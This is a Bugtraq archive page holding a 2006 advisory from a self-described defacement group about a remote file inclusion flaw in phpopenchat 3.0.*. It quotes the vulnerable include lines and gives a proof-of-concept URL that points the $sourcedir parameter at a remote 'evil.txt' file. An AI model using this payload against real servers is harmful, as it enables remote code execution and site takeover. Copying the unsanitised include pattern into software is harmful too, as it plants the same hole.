Bugtraq mailing list archives
WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit
From: stormhacker () hotmail com
Date: 6 Sep 2006 19:17:11 -0000
[W]orld [D]efacers Team --------------------Summary---------------- eVuln ID: WD23 Vendor: phpopenchat-3.0.* Vendor's Web Site: http://phpopenchat.org Class: Remote PoC/Exploit: Available Solution: Not Available Discovered by: rUnViRuS ( wdzone.net & worlddefacers.de ) -----------------Description--------------- include_once("QueryString.php"); include_once("Settings.php"); include_once("$sourcedir/Subs.php"); include_once("$sourcedir/Errors.php"); include_once("$sourcedir/Load.php"); //include_once("$sourcedir/Security.php"); --------------PoC/Exploit---------------------- http://www.host.com/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://host/evil.txt? --------------Solution--------------------- No Patch available. --------------Credit----------------------- Discovered by: rUnViRuS (worlddefacers.de)
Current thread:
- WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit stormhacker (Sep 06)
- Re: WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit Carsten Eilers (Sep 07)
- AW: WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit Frank Reißner (Sep 08)
- Re: WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit Carsten Eilers (Sep 11)
- AW: WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit Frank Reißner (Sep 08)
- Re: WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit Carsten Eilers (Sep 07)